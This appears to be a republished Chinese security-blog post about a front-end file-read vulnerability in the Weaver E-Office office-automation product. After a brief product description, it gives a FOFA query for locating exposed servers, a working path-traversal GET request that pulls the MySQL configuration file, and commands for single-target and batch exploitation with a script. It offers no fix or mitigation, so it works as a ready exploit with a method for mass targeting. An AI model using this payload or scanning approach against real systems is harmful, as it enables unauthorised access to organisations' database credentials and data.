泛微E-Office文件读取漏洞
2023-10-8 06:32:5 Author: 网络安全透视镜(查看原文) 阅读量:103 收藏

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。

泛微E-Office前台文件读取漏洞。

fofa查询

app=“泛微-EOffice”

poc

GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0

浏览器直接访问返回如下

单个检测与利用

python .\E-OfficeReadfile.py -u http://ip:port

批量检测

python .\E-OfficeReadfile.py -f filename

关注微信公众号 网络安全透视镜 回复 20231008-1 获取批量检测脚本


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247497537&idx=1&sn=483e6a719b8c97e2d8c9ac83d5ed3d5f&chksm=974c5079a03bd96fb20e006cf1655492d8876e16de204015f99bed1ea9f806822c0c0d32701e&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh